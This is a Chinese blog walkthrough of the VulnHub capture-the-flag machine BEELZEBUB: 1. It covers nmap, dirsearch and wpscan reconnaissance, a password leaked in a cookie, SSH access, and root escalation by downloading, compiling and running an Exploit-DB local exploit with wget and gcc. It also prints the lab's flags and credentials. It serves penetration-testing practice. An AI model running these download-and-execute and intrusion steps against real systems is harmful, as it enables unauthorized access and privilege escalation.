wait's〔三生石畔〕 善良人在追求中纵然迷惘,却终将意识到有一条正途。—— 歌德
【渗透测试-靶场】No.8- BEELZEBUB: 1 (vulnhub)渗透测试
发表于: | 分类: 安全测试 | 评论:0 | 阅读: 1706

一、前言

主要利用方式:信息收集:发现MD5目录+ wp的用户及密码获取+从历史记录中提取了本地服务提权exp

二、靶机信息

靶场: vulnhub.com
靶机名称: BEELZEBUB: 1
难度: 中等
发布时间: 2021 年 9月 8日
下载地址:https://www.vulnhub.com/entry/beelzebub-1,742/
备注:本靶场,思路与平常的靶机有一些出入,整体的困难点在于页面交互的提醒,
           以及ssh 的账号密码获取方式,到最后提权要依赖history才能后进行提权

三、虚拟机配置

vmware、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配

四、信息收集

1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l
1.png

2、探测靶机的开发端口及服务
└─$ sudo nmap -p- 192.168.169.155

└─$ sudo nmap -p22,80 -sV -A 192.168.169.155
2-1.png
2-2.png

3、浏览器访问80端口,及路径遍历
http://192.168.169.155/
3-1.png

└─$ dirsearch -u 192.168.169.155
3-2.png

4、路径访问index.php、phpmyadmin.php及初步尝试弱口令等
4-1.png

4-2.png

5、尝试了很多,依然没发现上哈地方还有可以探测的,经过其他文章提醒,发现index页面的apache版本和nmap扫描的不一致,并查源代码
5-1.png
得了一个提醒:
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
通过翻译:我的心被加密了,"beelzebub "以某种方式入侵并解码了它。-MD5
说被MD5加密了,我们把beelzebub用MD5加密一下
【MD5(beelzebub)==> d18e1e22becbd915b45e0e655429d487)】
5-2.png

6、通过加密后的数据,放入浏览器做对比,可以发现,这有可能是个目录
6-1.png

6-2.png

7、既然有可能是目录,进行目录扫描
7-1.png

7-2.png

8、通过对所有页面进行访问,只有upload可以正常访问
http://192.168.169.156/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/
8-1.png

经过探测,有Talk To VALAK 这个页面可以访问,并且抓包看起来是正常的。
8-2.png

9、经过抓包,发现输入任何内容进去,都反馈了:Set-Cookie: Password=M4k3Ad3a1
9.png

10、因为有22端口,尝试一下VALAK这个类似用户的东西,也可以顺带扫描一下wordpress 用户(果然发现:valak及krampus两个用户)

wpscan --url=http://192.168.169.156/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force
10-1.png
10-2.png

五、漏洞利用(突破边界)

11、再次验证了valak 用户存在,如果SSH(22)的密码为:M4k3Ad3a1?是否可以登录进去瞧瞧,
11.png

12、经过尝试(valak:M4k3Ad3a1 )密码错误,再次尝试用户(krampus:M4k3Ad3a1 )
12.png

13、krampus用户ssh登录,获取第一个flag
aq12uu909a0q921a2819b05568a992m9
13.png

14、尝试su 提权以及查找su权限执行的任务-->均失败
14.png

六、提权

15、history // 查看历史命令
15.png

 64  wget https://www.exploit-db.com/download/47009
   65  clear
   66  ls
   67  clear
   68  mv 47009 ./exploit.c
   69  gcc exploit.c -o exploit
   70  ./exploit 
   71  cd ../../../../../../../
   72  ls
   73  cd cd
   74  cd
   75  grep -r 'beelzebub'
   76  grep -r 'love'
   77  cd .local/share
   78  clear
   79  ls
   80  cd Trash/
   81  ls
   82  cat info

16、历史命令中存在下载提权操作的脚本,进行访问,此exp类似服务器本地提权漏洞
16.png

17、并在靶机按照步骤执行

wget https://www.exploit-db.com/download/47009
ls
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit

17.png

18、获取目标靶机IP,获取root权限下的flag(8955qpasq8qq807879p75e1rr24cr1a5)
18.png

标签: OSCP 渗透测试 kali 靶场 vulnhub

添加新评论

TOP